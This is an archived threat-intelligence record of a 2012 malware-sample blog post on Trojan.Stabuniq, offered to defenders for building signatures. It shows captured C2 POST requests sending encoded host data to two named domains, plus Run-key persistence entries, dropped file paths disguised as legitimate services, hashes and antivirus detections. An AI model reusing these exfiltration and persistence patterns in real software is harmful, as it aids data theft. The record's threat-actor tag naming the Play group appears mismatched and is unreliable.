{
	"id": "9d224568-0888-463d-9e15-91e8b4a47dbc",
	"created_at": "2026-04-06T00:06:47.324511Z",
	"updated_at": "2026-04-10T13:11:43.63814Z",
	"deleted_at": null,
	"sha1_hash": "fa51a98e20f85a937fdd65f80a62fb834ba45be7",
	"title": "Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 89108,
	"plain_text": "Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan\r\nArchived: 2026-04-05 14:46:49 UTC\r\nHoliday presents.\r\nResearch: Symantec. Trojan.Stabuniq Found on Financial Institution Servers\r\nMore research: Stabuniq in-Depth by Emanuele De Lucia\r\nHere is another minor news maker of 2012.\r\nIt is very well detected by most AV, but if you want to play with it or build IDS or YARA signatures, the pcap and the sample are below.\r\nFile\r\nFile: stabuniq_F31B797831B36A4877AA0FD173A7A4A2\r\nSize: 79360\r\nMD5: F31B797831B36A4877AA0FD173A7A4A2\r\nDownload (email me if you need the password)\r\nDownload pcap for F31B797831B36A4877AA0FD173A7A4A2\r\nF31B797831B36A4877AA0FD173A7A4A2\r\n========================================================================\r\n5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb\r\nCreated files:\r\nC:\\Program Files\\7-Zip\\Uninstall\\smagent.exe \u003c\u003c copy of itself F31B797831B36A4877AA0FD173A7A4A2\r\nInjected in iexplore.exe\r\nProcess ID: 1536 (iexplore.exe)\r\n1536 TCP 1130 172.16.253.129 SYN SENT 205.234.252.212:80\r\nAt this point the domains may be sinkholed.\r\nPOST /rssnews.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: benhomelandefit.com\r\nContent-Length: 1093\r\nCache-Control: no-cache\r\nid=NzQxKDYoNig3\u0026varname=SmdzdGc=\u0026comp=QkNKSl5S\u0026ver=UW9oYmlxdSZeVg==\u0026src=NTREb3I=\u0026sec=0\u0026view=dWtnYWNocihjfmMmKy\r\nPOST /rssnews.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: sovereutilizeignty.com\r\nContent-Length: 1093\r\nCache-Control: no-cache\r\nid=NzQxKDYoNig3\u0026varname=SmdzdGc=\u0026comp=QkNKSl5S\u0026ver=UW9oYmlxdSZeVg==\u0026src=NTREb3I=\u0026sec=0\u0026view=dWtnYWNocihjfmMmKy\r\nWhen the Trojan is executed, it may create the following files:\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\acroiehelper.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\groovemonitor.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\issch.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\jqs.exe\r\n%ProgramFiles%\\[FOLDER NAME ONE]\\[FOLDER NAME TWO]\\smagent.exe\r\nThe variable [FOLDER NAME ONE] may be one of the following:\r\nAcroIEHelper Module\r\nGrooveMonitor Utility\r\nInstallShield Update Service Scheduler\r\nJava Quick Starter\r\nSoundMAX service agent\r\nThe variable [FOLDER NAME TWO] may be one of the following:\r\nBin\r\nHelper\r\nInstaller\r\nUninstall\r\nUpdate\r\nNext, the Trojan creates the following registry entries so that it runs every time Windows starts:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"[FILE NAME]\"\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"[FILE NAME]\"\r\nHKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"[RANDOM GUID]\" = \"[FILE NAME]\"\r\nThe Trojan then creates the following registry entry:\r\nHKEY_CURRENT_USER\\Software\\Stability Software\\\"Uniq\" = \"[RANDOM GUID]\"\r\nNext, the Trojan may collect the following information from the compromised computer:\r\nArchitecture type\r\nComputer name\r\nFile name of the threat\r\nIP address\r\nOperating system version\r\nOperating system service pack version, if installed\r\nRunning processes\r\nThe Trojan may then send the stolen information to remote locations.\r\nhttps://www.virustotal.com/file/5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb/analysis/\r\nSHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb\r\nSHA1: 17db1bbaa1bf1b920e47b28c3050cbff83ab16de\r\nMD5: f31b797831b36a4877aa0fd173a7a4a2\r\nFile size: 77.5 KB ( 79360 bytes )\r\nFile name: vti-rescan\r\nFile type: Win32 EXE\r\nTags: peexe armadillo\r\nDetection ratio: 28 / 45\r\nAnalysis date: 2012-12-21 13:48:23 UTC ( 2 days, 16 hours ago )\r\nAhnLab-V3 Backdoor/Win32.Ruskill 20121221\r\nAntiVir TR/Graftor.27095.3 20121221\r\nAvast Win32:Ruskill-FQ [Trj] 20121221\r\nAVG Dropper.Generic6.CAIC 20121221\r\nBitDefender Gen:Variant.Graftor.27095 20121221\r\nDrWeb Trojan.Packed.22607 20121221\r\nEmsisoft Gen:Variant.Graftor.27095 (B) 20121221\r\nESET-NOD32 a variant of Win32/Injector.RVT 20121221\r\nF-Secure Gen:Variant.Graftor.27095 20121221\r\nFortinet W32/Injector.RVT!tr 20121221\r\nGData Gen:Variant.Graftor.27095 20121221\r\nIkarus Worm.Win32.Dorkbot 20121221\r\nKaspersky HEUR:Trojan.Win32.Generic 20121221\r\nMalwarebytes Backdoor.Bot.wpm 20121221\r\nMcAfee Generic.dx!bg3a 20121221\r\nMicrosoft Trojan:Win32/Buniq.A 20121221\r\nMicroWorld-eScan Gen:Variant.Graftor.27095 20121221\r\nNANO-Antivirus Trojan.Win32.Graftor.ymdbi 20121221\r\nNorman W32/Suspicious_Gen4.BCNST 20121221\r\nPanda Generic Malware 20121221\r\nPCTools Trojan.Stabuniq 20121221\r\nSophos Mal/FakeAV-QN 20121221\r\nSUPERAntiSpyware - 20121220\r\nSymantec Trojan.Stabuniq 20121221\r\nTheHacker Trojan/Injector.rvt 20121220\r\nTrendMicro TROJ_STABUNIQ.A 20121221\r\nTrendMicro-HouseCall TROJ_STABUNIQ.A 20121221\r\nVIPRE Trojan.Win32.Generic!BT 20121221\r\nSource: http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html"
	],
	"report_names": [
		"dec-2012-trojanstabuniq-samples.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434007,
	"ts_updated_at": 1775826703,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.pdf",
		"text": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.txt",
		"img": "https://archive.orkl.eu/fa51a98e20f85a937fdd65f80a62fb834ba45be7.jpg"
	}
}